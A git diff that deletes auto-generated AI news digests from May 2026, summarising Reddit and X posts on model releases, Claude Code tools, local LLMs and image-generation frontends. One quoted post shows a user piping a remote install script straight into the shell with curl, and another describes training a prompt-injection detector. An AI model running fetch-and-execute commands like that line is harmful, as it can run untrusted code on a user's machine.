DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff. — The 1.6-trillion-parameter model offers 1M-token context and fixed per-million pricing.](https://www.digg.com/ai/axzmul0l?rank=1) -*Digg AI* | Score: 1.00 -Tags: api_update - ---- - -## [DeepSeek makes its 75% discount on the DeepSeek-V4-Pro API permanent, keeping rates at one-quarter of prior levels for input and output tokens beyond the prior May 31, 2026 cutoff.](https://www.digg.com/ai/axzmul0l) -*Digg AI* | Score: 1.00 -Tags: api_update - ---- - -## [Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of eve…](https://x.com/AlphaSignalAI/status/2057875938180755757) -*X search / AI model updates* | 22/05/2026 | Score: 1.00 -Tags: developer_tool - -> Most security tools watch what runs in production. Perplexity just released one that scans what's sitting on developer laptops. Bumblebee fills the gap between SBOMs (what shipped) and EDR (what executed). It's a read-only inventory of every installed package, extension, and dev - ---- - -## [Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claud…](https://x.com/svg_icons/status/2057874901252370492) -*X search / Agent workflows* | 22/05/2026 | Score: 1.00 -Tags: mcp - -> Claude + MCP + SVG icons. I wrote a practical guide showing how Claude can use http:// SVGIcons.com as a custom connector to search and retrieve SVG icons directly inside a developer workflow. https:// svgicons.com/articles/svgic ons-claude-custom-connector … #Claude #MCP #AI #WebDev - ---- - -## [I built "zero2claude", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assum…](https://x.com/IShmool/status/2057872918348976191) -*X search / AI model updates* | 22/05/2026 | Score: 1.00 -Tags: cli_tool - -> I built "zero2claude", a free course that takes people from zero terminal experience to shipping with Claude Code. The curriculum goes from absolute zero → software basics → Claude Code fundamentals → advanced usage. No shortcuts, no assumptions. 17,000+ students. 7 - ---- - -## [trained a prompt injection detector using ml-intern and DeepSeek v4 Flash, runs in the browser](https://reddit.com/r/LocalLLaMA/comments/1tkoeuo/trained_a_prompt_injection_detector_using/) -*Reddit r/LocalLLaMA* | 22/05/2026 | Score: 1.00 -Tags: tool_update - -> Trained a prompt injection classifier using `ml-intern` \+ DeepSeek v4 Flash. DistilBERT, F1 99%, ONNX int8, \~65 MB, runs in browser with Transformers.js v3. You can try it here: [https://huggingface.co/spaces/av-codes/prompt-injection-detector](https://huggingface.co/spaces/av-codes/prompt-injection-detector) \--- I've been interested in prompt injections and agentic security for a while, and wanted to see how a purpose-built ML agent compares to general-purpose coding agents for this kind of task. Here's roughly how it went: `ml-intern` takes an HF token and supports OpenAI-compatible APIs, so I pointed it at OpenRouter (GPU-poor). The agent found existing datasets, [deepset/prompt-injections](https://huggingface.co/datasets/deepset/prompt-injections) and [Shomi28/prompt-injection-dataset](https://huggingface.co/datasets/Shomi28/prompt-injection-dataset), which simplified things since building the dataset is typically 95% of the work in tasks like this. For v1, I went with DistilBERT targeting CPU inference. After a few parameter sweeps, the agent launched a full run and landed at F1 95.87%. I also tried training an HRM-Text model, but the agent didn't figure it out and set up… - ---- - diff --git a/data/digest-2026-05-23.md b/data/digest-2026-05-23.md deleted file mode 100644 index 796d620..0000000 --- a/data/digest-2026-05-23.md +++ /dev/null @@ -1,121 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-23** | 15 stories | Auto-generated from 332 archived stories - ---- - -## [Open-source devtool for AI agent projects [P]](https://reddit.com/r/MachineLearning/comments/1tle50x/opensource_devtool_for_ai_agent_projects_p/) -*Reddit r/MachineLearning* | 23/05/2026 | Score: 1.00 -Tags: api_update, open_source, agent_tool - -> Hi everyone, We are building **AgentLantern**, an open-source devtool for AI agent projects. The idea is simple: as agent-based projects grow, it becomes harder to understand how agents, tasks, tools, and configuration files are connected. **AgentLantern** aims to make these projects easier to document, analyze, validate, and visualize. I started with CrewAI support, but the goal is to progressively extend **AgentLantern** to other agent frameworks. **AgentLantern** currently provides three main features: * **Lantern Docs**: generates browsable documentation from source code and configuration files, without LLM calls or API keys. * **Lantern Lint**: statically checks agent projects to detect design or configuration issues before runtime. * **Lantern Play**: runs the project and opens a pixel-art runtime viewer to observe agents working, delegating, calling tools, and producing outputs. The project is still early, and I’m mainly looking for feedback from people building with AI agents, multi-agent systems, or devtools. here is a demo video showing the execution of a multi-agent system: [3\_mins\_Video](https://www.youtube.com/watch?v=Rklr86AiKuk) Docs: [https://brellsanwouo.github.… - ---- - -## [Apex-Testing: real-world, real repos, agentic coding benchmark (Update)](https://reddit.com/r/LocalLLaMA/comments/1tlh4vq/apextesting_realworld_real_repos_agentic_coding/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: tool_update, agent_tool - -> **BIG Apex-Testing update!** [https://www.apex-testing.org/](https://www.apex-testing.org/) **The Real-World Agentic Coding** benchmark has been (95%) updated with all recent models! This is based on 65-70 **actual private github repos** made especially to test proper agentic coding capabilities of models. **For those who don't know about the project and see it for the first time, here's the excerpt from the website:** "**What is APEX Testing?** Every week there's a new model that's "the best ever." Every provider promises 10x performance at a fraction of the cost. Benchmarks get cherry-picked, their demos get curated, influencers get paid and people keep falling for it. APEX exists because I got tired of the hype and the intentional benchmaxxing. Models get dropped into real codebases with real bugs and real feature requests, and they have to figure it out like a developer would. 70 tasks across 8 categories, all based on work you'd actually encounter on the job. You get to see what actually works and what's just marketing." **What's included currently in metrics:** \- Avg Cost \- Avg Time \- Scoring based off each category/difficulty \- ELO-based Leaderboard (see details on the… - ---- - -## [LLaMa.cpp basic question](https://reddit.com/r/LocalLLaMA/comments/1tlat5r/llamacpp_basic_question/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: developer_tool, cli_tool - -> I'm trying to install LLaMa with PI agent. I ran curl -fsSL https://pi.dev/install.sh | sh export PATH="/home/user/.local/share/pi-node/node-v22.22.3-linux-x64/bin:$PATH pi install npm:pi-llama.cpp ​ These commands installed pi, added them to path and then I lastly installed an extension that supposedly allows PI agent to connect to my llama models (was that safe or is there a safer way of doing it?). Lastly I ran `yay llama.cpp-vulkan` to install llama.cpp-vulkan.​ Unlike Ollama where I can just get models super easily I have no clue how to get them here. I googled it and asked ChatGPT but I still am so confused. Am I missing something? How do I do it? - ---- - -## [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://reddit.com/r/LocalLLaMA/comments/1tl4wpi/meituanlongcatlongcatvideoavatar15_hugging_face/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: open_source, developer_tool - -> # 🚀 Model Introduction We are excited to announce the release of LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate lip-synchronization, full-body temporal stability, and robust long-video generation with strict identity consistency. * 🌟 **Stylized Domain Generalization**: Robustly generalizes to anime, animals, and complex real-world conditions such as multi-person interactions and object handling. * 🌟 **Efficient 8-Step Inference**: Advanced DMD2-… - ---- - -## [IMG Dataset Refiner v4.3 Pro is here! 🚀 The ultimate dataset prep tool for LoRAs](https://reddit.com/r/StableDiffusion/comments/1tl36zc/img_dataset_refiner_v43_pro_is_here_the_ultimate/) -*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hey everyone! A while back I shared v3 of my dataset tool. It was a great visual manager and balancer, but as I said back then: it didn't have auto-captioning. Well, that has completely changed! Welcome to v4.3 Pro. The project has taken a massive leap forward and is now a complete, professional *Data Engineering* suite for your AI model training (Flux, SD3, SDXL, etc.). **What's new?** 🤖 **Full AI Integration:** Local AI (LM Studio/Ollama) & Cloud APIs (Claude, Gemini, OpenAI) to auto-caption, translate, and even hunt down visual hallucinations. 🪄 **Smart AI Recipe Generation:** It automatically analyzes your entire dataset and generates the perfect keyword "recipe" (pinning your Trigger Word to the top) for Civitai! 📚 **Mass Batch Editor:** Add, remove, or replace specific tags across a huge selection of images in a single click. 🧹 **Built-in Pre-processing:** Visual duplicate finder, Smart Face Cropping, and mass high-quality resizing. ⚡ **Lightning Fast UI:** Native drag-and-drop for Windows folders, side toggles for a bigger workspace, and real-time translation. It's still the "recipe book for your LoRAs", and it's still 100% Open-Source! I've even added 1-click Windo… - ---- - -## [got tired of claude code forgetting everything every session, built VIR for it](https://reddit.com/r/ClaudeAI/comments/1tlcai2/got_tired_of_claude_code_forgetting_everything/) -*Reddit r/ClaudeAI* | 23/05/2026 | Score: 0.86 -Tags: mcp, cli_tool - -> Every session i'm debugging something, figuring out a pattern, making some decision with claude that took us 30 minutes to think through. Then i close the terminal and it's just gone. Next day i'm asking the same questions about the same codebase. I was already tracking stuff manually. CLAUDE.md per project, lessons.md, handoff.md, tasks/ folders. But i'd only write down maybe 5% of what was actually useful. The real reasoning was always still buried in the transcripts. Looked in \~/.claude/projects one day. 226 jsonl files sitting there. Months of work, none of it being used. So i built vir. It reads your sessions in the background, classifies them (pattern / gotcha / decision / tool), distills the useful stuff into an obsidian vault. Then exposes the vault as an mcp server so claude can query it mid-session, basically giving claude code memory across sessions. You can also query it yourself if you're curious what's in there: \`\`\` vir query "what gotchas have i hit with auth" \`\`\` There's stuff in those transcripts you'll never reread manually. Vir surfaces it. Ran it on my own 226 sessions: 126 notes out, 0.91 avg confidence, across 8 projects. Local-first, runs on mac/linux… - ---- - -## [Four calls became one: letting the agent author tools mid-session](https://reddit.com/r/ClaudeAI/comments/1tl91km/four_calls_became_one_letting_the_agent_author/) -*Reddit r/ClaudeAI* | 23/05/2026 | Score: 0.70 -Tags: mcp, developer_tool - -> MCP in practice is a connector marketplace, not a runtime. You pick servers up front, the agent inherits a fixed catalog, and turn 1 looks the same as turn 200. The session conforms to the toolset. That ordering is backwards. Most non-trivial work surfaces a tool-shaped gap halfway through. The general catalog gets there in five calls. A bespoke wrapper gets there in one and survives into the next session. The question is whether the agent can close that gap without leaving the conversation. Yesterday I was chasing a flaky recipe. Four calls, every time: query traces, grep for the name, sort by timestamp, diff the two most recent failures. The agent noticed on the third repetition and wrote `findFlakyRecipeRuns(name)` into a watched plugin directory — a wrapper around the existing tools that returns the diff directly. Next turn, one call. By the end of the session there were four of these. I wouldn't have specified any of them in advance; all of them match the shape of the work. The literature calls this a self-modifying execution environment. It's been a footnote because five things have to be true together: 1. The agent writes a tool definition. 2. The runtime registers it witho… - ---- - -## [Jack Clark announces fictional story with optimistic outlook on humanity's future amid powerful AI systems for next Import AI newsletter — Issue publishes Tuesday; reply questions thematic shift.](https://www.digg.com/ai/esmbs3o1?rank=8) -*Digg AI* | Score: 1.00 -Tags: product_launch - ---- - -## [SemiAnalysis posted data from 174,264 agentic coding sessions showing 42% of runtime on CPU tasks versus 58% on GPU inference and highlighted cloud pricing mismatches with per-token monetization — Median per-turn time measured 5.13 seconds.](https://www.digg.com/ai/h7rp9igv?rank=6) -*Digg AI* | Score: 1.00 -Tags: agent_tool - ---- - -## [What features do you wish ComfyUI or A1111 had?](https://reddit.com/r/StableDiffusion/comments/1tllp2t/what_features_do_you_wish_comfyui_or_a1111_had/) -*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 -Tags: open_source - -> TL;DR: I’m building a local orchestration layer on top of ComfyUI, A1111, and Easy Diffusion that manages workflows, prompt generation, tagging, scoring, and generation history to figure out which models/LoRAs/settings actually produce the best results over time. What next features would you find useful? A little while ago I asked people what features they liked most in their local AI image/video UI setups. Since then I’ve kept building my own local orchestration app around ComfyUI, Easy Diffusion, and Automatic1111, and it has evolved into more of a full workflow layer than I originally planned. I’ll eventually open source it, so I’d love feedback from people who spend a lot of time with local generation tools. The idea is basically this: Instead of using one UI directly for everything, the app sits on top of multiple local backends and manages the overall generation workflow, history, orchestration, and review process. Right now it supports: * launching/stopping backends from inside the app * choosing which backend to use per run * queued multi-run jobs * image + video generation workflows * selecting saved ComfyUI workflows * centralized gallery/history across all runs * per-im… - ---- - -## [GitHub - ForgeFlash: A clean, minimal frontend for Stable Diffusion WebUI Forge — inspired by Fooocus's streamlined workflow but with direct access to the controls that actually matter.](https://reddit.com/r/StableDiffusion/comments/1tll04p/github_forgeflash_a_clean_minimal_frontend_for/) -*Reddit r/StableDiffusion* | 23/05/2026 | Score: 1.00 -Tags: api_update - -> Hi all. My workflow usually includes quick drafting with Fooocus and/or WebUI before committing to batch generation in ComfyUI, and while I enjoy the streamlined approach of Fooocus, the missing hi-res/upscale etc is a drag. And WebUI sometimes feels a bit too busy for when I just want to 'prompt and go'. So I created this very simple new UI which sits between the two philosophically. You need Forge running, but the UI itself is very streamlined HTML/JS/CSS file leveraging Forge in API mode. The Readme covers all the details and modifying the hard coded parts is quite simple. Just launch forge with API parameters and open the web page in your browser, it will point to [http://127.0.0.1:7860](http://127.0.0.1:7860) by default and get your installed checkpoints etc. PNG metadata stripping also included. Any comments and feedback welcome, as I do have some ideas for further development, but intend to keep it lightweight and easy to approach. - ---- - -## [Benchmarked Needle 26M vs Qwen3-0.6B on CPU function calling, 50 queries across 5 difficulty tiers. The 23x smaller model wins on accuracy and is 4.4x faster.](https://reddit.com/r/LocalLLaMA/comments/1tljs5o/benchmarked_needle_26m_vs_qwen306b_on_cpu/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: api_update - -> Ran a head-to-head on two open-weight models for tool-calling on a 4-core CPU, no GPU, no cherry-picking. Wanted to see if the small specialist (Needle, 26M, distilled from Gemini 3.1 for function calls) actually holds up against a small generalist (Qwen3-0.6B) that also does tools. Setup: 50 queries across 5 tiers (simple, paraphrased, implicit, ambiguous, edge cases including foreign language and a "don't call any tool" trap). 5 mock tools. Three metrics per run: parse\_success, tool\_match, args\_match. Same queries, same eval rubric, same hardware. Headline numbers: Needle (26M) Qwen3 (0.6B) tool_match overall 72.0% 56.0% parse_success 84.0% 54.0% args_match | match 97.2% 100.0% mean latency 10.9s 47.9s The interesting part is not the overall win, it's the failure shapes. They diverge completely: * **Needle** fails by picking the wrong tool. When it does pick a tool, args are right 97% of the time. Its sin is selection, mostly routing system commands to search\_web instead of run\_command. * **Qwen3** fails by not calling a tool at all. Every single one of its 22 misses is a parse failure where it answered in prose instead of emitting `<tool_call>` tags. When it does emi… - ---- - -## [GPT 5.5 "secret sauce" is just having the thinking be some stupid caveman mode?](https://reddit.com/r/LocalLLaMA/comments/1tljrtk/gpt_55_secret_sauce_is_just_having_the_thinking/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: open_source - -> I think I had GPT-5.5 leak its trace during a normal conversation, and it really reads like the caveman mode fad from a few months back. Maybe we can achieve better token efficiency by taking some high-quality thinking trace from an open model, "caveman-izing" it, and fine-tuning on it. Here is the full log of GPT-5.5 going insane: https://gist.github.com/aussetg/20747ae00df17992acb4ebdfcd8d8d88 EDIT: Ok people I got it the first time - ---- - -## [My experience using Claude code with Local Llm, and full guide on how to set it up](https://reddit.com/r/ClaudeAI/comments/1tlir65/my_experience_using_claude_code_with_local_llm/) -*Reddit r/ClaudeAI* | 23/05/2026 | Score: 1.00 -Tags: api_update - -> Wanted to share a workflow I tested on a real flight, in case anyone else is trying to set up offline Claude Code. The core idea: using ollama to pull the needed model of what you need, and then use it to run claude code The setup, in order: 1. Pull a model on home wifi the night before. \`ollama pull <model>\` — \~9 GB for a 14B, \~17 GB for a 26B. Don't try this at the gate. 2. In Claude Code, point at Ollama. The cleanest path I found is wrapping it in two aliases: alias claude-local='ollama launch claude --model gemma4:26b' alias claude-cloud='claude' 3. Verify on the ground with wifi physically off. If it works in airplane mode at home, it works at 10 km in the sky. Where I got it wrong: I prepped qwen2.5-coder:14b first because it's the model everyone recommends in local-LLM threads. On the flight, it choked on Claude Code's tool loop; one call took 25 seconds, another took 52. For a workflow that chains five or six tool calls per task, that's unusable. Switched mid-flight to gemma4:26b (which I'd pulled as a backup). Different category of model, RL-trained for tool use, not just code completion. The tool loop ran at a usable speed. The gap analysis I was running on a… - ---- - -## [Removing Vision from model](https://reddit.com/r/LocalLLaMA/comments/1tlhkts/removing_vision_from_model/) -*Reddit r/LocalLLaMA* | 23/05/2026 | Score: 1.00 -Tags: agent_tool - -> I removed mmproj file from models to remove vision and save my vram. But just curious, is this really don't affect its text ability? I use Qwen 3.6 35b a3b by unsloth and mainly use for agentic coding - ---- - diff --git a/data/digest-2026-05-24.md b/data/digest-2026-05-24.md deleted file mode 100644 index 7c969dc..0000000 --- a/data/digest-2026-05-24.md +++ /dev/null @@ -1,125 +0,0 @@ -# Stack Scout - AI News Digest -**2026-05-24** | 15 stories | Auto-generated from 365 archived stories - ---- - -## [I built a local GUI for the TradingAgents framework — works with Ollama](https://reddit.com/r/LocalLLaMA/comments/1tm2ct0/i_built_a_local_gui_for_the_tradingagents/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: open_source, developer_tool, cli_tool, tool_update - -> https://preview.redd.it/i90oxxk7n03h1.png?width=1898&format=png&auto=webp&s=7d219c804fda7dfe122b84fcdb6d0d6883818c68 A while back I came across [TradingAgents](https://github.com/TauricResearch/TradingAgents) — a really cool multi-agent LLM stock analysis framework where like a dozen "agents" (market analyst, news analyst, bull researcher, bear researcher, risk team, etc.) debate a stock and produce a final trade recommendation. The output is genuinely interesting to read. Problem: it ships as a CLI. You pick options in a terminal, watch logs scroll, then go hunt for markdown files on disk. The reports are good, the experience of getting to them isn't. So I forked it and bolted on a web GUI. Runs locally, talks to whatever LLM provider you have a key for (OpenAI, Anthropic, Google, OpenRouter, DeepSeek, Ollama, xAI, Qwen, GLM, MiniMax). All Apache 2.0. Some things I ended up adding because I wanted them: * Live pipeline visualization showing which agent is working * Reports tab with a 3-pane reader, table-of-contents, search * A "report length" knob (Concise / Standard / Comprehensive) — concise mode saves \~50% tokens * Multi-session chat where you can pin past report… - ---- - -## [VRAM Suite: early pre-alpha tool for VRAM diagnostics, bounded CUDA probing, and OOM risk estimation](https://reddit.com/r/StableDiffusion/comments/1tmixth/vram_suite_early_prealpha_tool_for_vram/) -*Reddit r/StableDiffusion* | 24/05/2026 | Score: 0.94 -Tags: api_update, developer_tool, cli_tool - -> # I started building VRAM Suite — a small framework for VRAM diagnostics in local AI workflows Hi. I wanted to share a small pre-alpha project I started building: \*\*VRAM Suite\*\*. The basic idea is simple: local AI workflows often fail with CUDA OOM only after everything has already started. I got tired of guessing how much VRAM is actually usable, so I started writing a small Python framework to inspect, record, and later predict VRAM behavior. It is still early, but the current version already has a working foundation. # What works now * CLI command: \`vramsuite doctor\` * Public Python API: \`import vramsuite\` * Structured doctor API: \`run\_doctor()\` * System/runtime fingerprinting * Optional PyTorch/CUDA detection * NVIDIA GPU memory reading through NVML using \`ctypes\` * Driver-level total/free/used VRAM without requiring PyTorch * \`.vramcard\` JSON profile format * Rich terminal report output * Optional bounded CUDA allocation probe through PyTorch * Basic OOM risk estimation using \`--estimate-mb\` # Example `uv run vramsuite doctor --probe --probe-max-mb 12288 --probe-step-mb 256 --probe-free-floor-mb 2048 --estimate-mb 8000` # Example output summary from my RTX 50… - ---- - -## [Claude working autonomously](https://reddit.com/r/ClaudeAI/comments/1tm9gm5/claude_working_autonomously/) -*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 -Tags: api_update, mcp, developer_tool - -> Goodmorning, Has anyone figure out how to configure Claude so that it runs autonomously, almost like Openclaw? I wanted to figure out if it could just autonomously respond to LinkedIn messages and reach out on my behalf? I know i can do this within cowork with mcp servers and tools but didn’t know if managed agents or the SDK would be my best option to try and create this full system - ---- - -## [Agent Zero CLI Update Signals Computer Use Polish For Agent Frameworks](https://x.com/alessandro_a0/status/2058278886572433812) -*Aligned News (Scoble)* | 24/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> A current post says A0 CLI v1.11 and Agent Zero v1.17 are live after a Computer Use announcement. - ---- - -## [Working on a cgo-free CUDA binding in Go for ML stuff Week 3 - open source [P]](https://reddit.com/r/MachineLearning/comments/1tmb4qw/working_on_a_cgofree_cuda_binding_in_go_for_ml/) -*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 -Tags: api_update, open_source - -> At our work we use CUDA in Rust since the company switched to it recently. Rust has pretty good Driver API bindings but it made me wonder why the hell we cant have something decent in Go without cgo. I mostly build ML tools in the last month and Go is my main language for pretty much everything. Problem is most Go CUDA projects still need cgo and the full toolkit at build time. That breaks cross compilation and makes Docker images huge which sucks when working on machine learning projects. So last month I started messing around with a proof of concept that loads [libcuda.so](http://libcuda.so) at runtime using purego. No cgo at all. Biggest pain was thread affinity. CUDA keeps context per thread so goroutines switching around kept breaking things. I built a simple executor that locks an OS thread with runtime.LockOSThread and funnels all calls through a channel. Heres roughly what using it looks like right now: func run() error { cuda.Init() dev, _ := cuda.GetDevice(0) ctx, _ := dev.Primary() defer ctx.Close() a, _ := cuda.Alloc[float32](ctx, 1024) b, _ := cuda.Alloc[float32](ctx, 1024) c, _ := cuda.Alloc[float32](ctx, 1024) stream, _ := ctx.NewStream() start, _ := ctx.NewEvent()… - ---- - -## [PapersWithCode new features - week 1 [P]](https://reddit.com/r/MachineLearning/comments/1tmawv5/paperswithcode_new_features_week_1_p/) -*Reddit r/MachineLearning* | 24/05/2026 | Score: 1.00 -Tags: open_source, tool_update - -> Hi, Niels here from the open-source team at Hugging Face. It's been one week since I [launched](https://www.reddit.com/r/MachineLearning/comments/1tgmwqr/reviving_paperswithcode_by_hugging_face_p/) [paperswithcode.co](http://paperswithcode.co), a revival of the website we all loved. It allows us to keep track of the state-of-the-art (SOTA) across various domains of AI, from agents to computer vision and time-series forecasting. The reception has been great, and I'm excited to extend this over the next few months. This week, I've added the following features: \- Support for multiple metrics for a given benchmark: leaderboards now support multiple metrics, see e.g., the [Open ASR Leaderboard](https://paperswithcode.co/benchmark/open-asr-leaderboard) for automatic speech recognition, which supports both Word Error Rate (WER) and the Inverse Real-Time Factor (RTFx) metrics, or the [Object Detection leaderboard](https://paperswithcode.co/benchmark/coco-val2017), which now also reports frames-per-second (FPS) besides mean average precision (mAP) on COCO. https://preview.redd.it/owlxn0b5u23h1.png?width=2878&format=png&auto=webp&s=1dff2f8feab4f160f77c97ceeb5d90e82382e63c \- Su… - ---- - -## [Qwen Plays ̶p̶̶o̶̶k̶̶e̶̶m̶̶o̶̶n̶ ? / QWEN PLAYS DCSS! - qwen3.6-35b-a3b@q4_k_xl plays open source roguelike adventure DCSS (and does a decent job)](https://reddit.com/r/LocalLLaMA/comments/1tm9nx3/qwen_plays_pokemon_qwen_plays_dcss_qwen3635ba3bq4/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: open_source, cli_tool - -> Hi, (TLDR.): Qwen in its MTP version has tool call bugs and outputs everything into tool/thinking blocks - mangeling the output - canceling the +speed with repeated wrong tool calls! DCSS works well with non MTP qwen even on smaller qwants. im Testing the new MTP models and thought the Hermes plays pokemon skill would be fun to test - expecting codex doing a good job and Qwen at least being able to navigate etc - but after a little research it looks like all LLM (even the big ones) cant play pokemon without hickups - so i tried to find a game the LLM can play - to use it as benchmarks - all the numbers from the official benchmarks are a nice indicator but i wanted real tests - after tons of IMG research and push to telegram etc - palying games seemed the next step to test - Qwen can play DCSS in its qwen3.6-35b-a3b@q4\_k\_xl NON MTP VERSION pretty well! in a Terminal you can see/control if needed! - telegram text update + ascii/screenshots on milestones or errors \- MTP version produced mangeled tool calls! (240k context/8koutput token, 0,6 temp/20topK, 1Rep. penalty, 1.5 pres. penalty, 0.95 topP) LM studio on 5090 if anyone is interested in the skill / prompt i can upload it late… - ---- - -## [How I do use the recent llama.cpp native tools to do web rag a.k.a. web_fetch (or anything else for the matter) directly from inside the llama-server's webui](https://reddit.com/r/LocalLLaMA/comments/1tm93ng/how_i_do_use_the_recent_llamacpp_native_tools_to/) -*Reddit r/LocalLLaMA* | 24/05/2026 | Score: 1.00 -Tags: cli_tool, agent_tool - -> As some other fellow lllmers I've discovered few days ago that the amazing llama.cpp project has just added native tools functionalities into the server. After having enabled the relative options into llama-server and played a bit with the most harmless of them all, get\_datetime, I've bit the bullet and cautiously enabled the big boss: exec\_shell\_command. Building upon my recent sandboxing efforts relative to pi coding agent, another fantastic tool, I implemented this workflow to more safely use it into linux by multi-sandboxing: step 0) enabled llama-server options for native tools step 1) install firejail system wide step 2) create a new linux user called vmagents (a.k.a. "virtual machine agent smith") to prevent escalation or messing up with my own user workspace home dir step 3) login into vmagents user and install smolmachines, an easy to use OCI virtual machine containers harness step 4) create a VM called minivm and start it to pull in a bare bones busybox commands based Alpine linux OCI image step 5) create the script minivm-exec (and make it executable) into vmagents exec dir to spinup the sandbox VM, exec a given command into it into further firejail sandbox, turn it… - ---- - -## [48 frontends for Comfy!](https://reddit.com/r/StableDiffusion/comments/1tm25k8/48_frontends_for_comfy/) -*Reddit r/StableDiffusion* | 24/05/2026 | Score: 1.00 -Tags: api_update, tool_update - -> This is an update of the list that I made 5 months ago. [4 months ago it was 26](https://www.reddit.com/r/StableDiffusion/comments/1qyrw4z/26_frontends_for_comfy/). Many of UIs were suggested by user iwr-redmond. Below is list with only names; links, descriptions are in the awesome list itself on github: [https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui](https://github.com/light-and-ray/awesome-alternative-uis-for-comfyui) Category 1: Close integration, work with the same workflows 1. SwarmUI 2. Minimalistic Comfy Wrapper WebUI 3. Open Creative Studio for ComfyUI 4. ComfyUI Mobile Frontend 5. ComfyMobileUI 6. ComfyChair 7. ComfyScript 8. WorkflowUI 9. FlowScale AIOS 10. ComfyUI-Workflow-Studio 11. Promptus CosyUI Category 2: UI for workflows exported in API format 1. ViewComfy 2. ComfyUI Mini 3. Generative AI for Krita (Krita AI diffusion) 4. Intel AI Playground 5. Comfy App (ComfyUIMobileApp) 6. ComfyUI Workflow Hub 7. Mycraft 8. ComfyUI WebUI Generator 9. Nexa - Your On-the-Go ComfyUI Companion 10. CivitDeck 11. ComfyUI Skills for OpenClaw 12. ComfyUI\_bsk\_UI 13. OutSweeper 14. Orange Category 3: Use Comfy UI as runner server (worklows made by developers) 1.… - ---- - -## [🚀 Skills for small businesses, officially released by Anthropic](https://reddit.com/r/ClaudeAI/comments/1tm94ai/skills_for_small_businesses_officially_released/) -*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 -Tags: developer_tool, agent_tool - -> Anthropic’s 31 small-business skills reportedly hit around 382,000 downloads on day one. And now someone has mapped the whole thing into a setup workflow that can apparently be deployed in \~10 minutes. This is actually a pretty interesting shift. Small businesses used to stitch together automations manually across: Zapier Notion CRM tools email workflows internal docs custom scripts Now AI companies are starting to package the whole thing into reusable skill packs: 🧠 workflow 📚 memory ⚙️ behavior 🔗 connectors 🤖 orchestration 📋 operating rules Basically: business operations as AI-readable skill files. The best part? You don’t necessarily need Claude to use them. At the core, these are still .md skill files describing workflows for AI agents. So even if you’re using Codex, Cursor, Gemini, or another coding agent, you can still study the structure, adapt the workflows, and plug the ideas into your own agent setup. This feels like the beginning of a new category: “AI business operating templates.” GitHub: https://github.com/anthropics/knowledge-work-plugins - ---- - -## [Claude code - Cultivate your context window to get the max out of your tokens](https://reddit.com/r/ClaudeAI/comments/1tm594m/claude_code_cultivate_your_context_window_to_get/) -*Reddit r/ClaudeAI* | 24/05/2026 | Score: 0.86 -Tags: api_update, mcp - -> Many times during the start of the session or when you have cleared or compacted the session, claude tends to read the entire codebase resulting in context window bloating. if your repo is large and/or if you are working with multiple repos it means your context window will have a lot of stuff which are not really relevant for the feature work that you are doing rn. Instead of claude having to read the entire codebase you have a map of your repos at different granularity and guide claude using [claude.md](http://claude.md) file to read the map. this helps claude get the context better without the context window bloating. if you are working on typescript/javascript based repos you can check what i built here in this repo: [https://github.com/justinjamesmathew/tokenmax-mcp](https://github.com/justinjamesmathew/tokenmax-mcp) the idea is to have three tiers of structural context loaded at three different times. The Registry is a small directory of every repo that is registered, with a short paragraph for each covering what it does, what stack it uses, where it lives, and when it was last indexed. It loads automatically into every Claude Code session via \~/.claude/[CLAUDE.md](http://c… - ---- - -## [LongCat-Video-Avatar 1.5 Release](https://reddit.com/r/StableDiffusion/comments/1tm5oxh/longcatvideoavatar_15_release/) -*Reddit r/StableDiffusion* | 24/05/2026 | Score: 0.78 -Tags: open_source, developer_tool - -> HuggingFace Link: [meituan-longcat/LongCat-Video-Avatar-1.5 · Hugging Face](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5) LongCat-Video-Avatar 1.5, an upgraded open-source framework that prioritizes extreme empirical optimization and production-readiness for audio-driven human video generation. Built upon the LongCat-Video foundation model, v1.5 delivers highly stable, commercial-grade avatar video synthesis supporting native tasks including Audio-Text-to-Video (AT2V), Audio-Text-Image-to-Video (ATI2V), and Video Continuation, with seamless compatibility for both single-stream and multi-stream audio inputs. # [](https://huggingface.co/meituan-longcat/LongCat-Video-Avatar-1.5#key-features)Key Features * 🌟 **Upgraded Audio Encoder (Whisper-Large):**: Replaces Wav2Vec2 with Whisper-Large, yielding significantly smoother and more natural lip dynamics. * 🌟 **Production-Ready Stability**: Achieves accurate 